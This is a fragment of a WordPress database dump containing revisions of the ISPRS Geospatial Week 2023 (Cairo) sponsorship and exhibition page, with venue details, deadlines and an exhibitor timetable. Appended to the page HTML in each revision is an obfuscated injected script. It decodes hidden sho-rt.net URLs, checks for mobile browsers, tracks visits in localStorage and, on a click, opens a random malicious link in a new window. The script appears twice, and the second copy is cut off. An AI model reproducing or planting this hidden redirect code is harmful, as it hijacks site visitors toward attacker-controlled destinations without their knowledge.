style=\"font-size: 10pt;\">12:00-17:00</span></p>\n<p><span style=\"font-size: 10pt;\">18:00 – 20:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition Opening</span></p>\n<p><span style=\"font-size: 10pt;\">Welcome Reception</span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 4</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">9:00 – 17:00</span></p>\n<p><span style=\"font-size: 10pt;\">18:00 – 20:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition</span></p>\n<p><span style=\"font-size: 10pt;\">Exhibitors’ reception</span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 5</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">9:00 – 15:00</span></p>\n<p><span style=\"font-size: 10pt;\">15:00 – 18:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition</span></p>\n<p><span style=\"font-size: 10pt;\">Dismantle Exhibition</span></td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 10pt;\">The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</span></p>\n<p>&nbsp;</p>\n<h1><span style=\"font-size: 12pt;\">INFORMATION</span></h1>\n<p><span style=\"font-size: 10pt;\">For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact the organizing committee by mail (<a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or <a href=\"https://gsw2023.com/index.html\">info@gsw2023.com</a> ).</span>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2023-03-23 03:51:10','2023-03-23 03:51:10','',2920,'https://gsw2023.com/?p=3941',0,'revision','',0),
(3942,1,'2023-03-23 03:51:58','2023-03-23 03:51:58','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">ISPRS GEOSPATIAL WEEK 2023</span></h1>\n<h2 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">SPONSORSHIP AND EXHIBITION ,</span><span style=\"font-size: 18pt;\">Cairo – Egypt 2-7 September 2023</span></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<span style=\"font-size: 10pt;\">The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</span></p>\n<p><span style=\"font-size: 10pt;\">The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series of dedicated workshops. More information regarding ISPRS can be found at: http://www.isprs.org/.</span></p>\n<p><span style=\"font-size: 10pt;\">An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</span></p>\n<p><span style=\"font-size: 10pt;\">A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or Prof. Amr Hanafi at <a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a> or Prof Alaa Abd El Bary <a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a> for more details on the sponsorship opportunities for the GSW/2023.</span></p>\n<p><span style=\"font-size: 10pt;\">We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</span></p>\n<p><span style=\"font-size: 10pt;\">The GSW2023 Organizing Committee.</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><span style=\"font-size: 12pt;\"><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></span></h5>\n<p><span style=\"font-size: 10pt;\">Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El-Sheimy at <a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or Prof. Amr Hanafi at <a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a> or Prof Alaa Abd El Bary <a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a> or <a href=\"https://gsw2023.com/index.html\">info@gsw2023.com</a> .</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3933\" img_size=\"1800x2200\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><span style=\"font-size: 12pt;\"><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></span></h5>\n<p><span style=\"font-size: 10pt;\">(<a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_undefined\">https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_undefined</a>)</span></p>\n<p><span style=\"font-size: 10pt;\">The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3936\" img_size=\"1200x1200\" alignment=\"center\" image_hovers=\"false\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><span style=\"font-size: 10pt;\">Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</span></p>\n<ul>\n<li><span style=\"font-size: 10pt;\">May 1, 2023 Deadline for sponsorship confirmation and payment</span></li>\n<li><span style=\"font-size: 10pt;\">June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</span></li>\n</ul>\n<p><span style=\"font-size: 10pt;\"><strong> </strong></span><span style=\"font-size: 10pt;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Heliopolis Campus</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Re: ISPRS GSW’2023</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>ATT: Prof. Alla Abdelbary</strong></span></p>\n<p><span style=\"font-size: 10pt;\">P.O. Box 2033 -Elhorria El Moshir Ismail st.-behind Sheraton Bldg. </span></p>\n<p><span style=\"font-size: 10pt;\">(+202) 22685616 - 22685615 </span></p>\n<p><span style=\"font-size: 10pt;\">(+202) 22685892</span></p>\n<p>&nbsp;</p>\n<h1><span style=\"font-size: 12pt;\">CONFERENCE PROGRAM FOR EXHIBITORS</span></h1>\n<p>&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 2</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\"><strong>9:00 – 5:00</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong> </strong></span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\"><strong>Tutorial Day</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Exhibition Setup</strong></span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 3</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">12:00-17:00</span></p>\n<p><span style=\"font-size: 10pt;\">18:00 – 20:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition Opening</span></p>\n<p><span style=\"font-size: 10pt;\">Welcome Reception</span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 4</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">9:00 – 17:00</span></p>\n<p><span style=\"font-size: 10pt;\">18:00 – 20:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition</span></p>\n<p><span style=\"font-size: 10pt;\">Exhibitors’ reception</span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 5</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">9:00 – 15:00</span></p>\n<p><span style=\"font-size: 10pt;\">15:00 – 18:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition</span></p>\n<p><span style=\"font-size: 10pt;\">Dismantle Exhibition</span></td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 10pt;\">The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</span></p>\n<p>&nbsp;</p>\n<h1><span style=\"font-size: 12pt;\">INFORMATION</span></h1>\n<p><span style=\"font-size: 10pt;\">For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact the organizing committee by mail (<a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or <a href=\"https://gsw2023.com/index.html\">info@gsw2023.com</a> ).</span>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 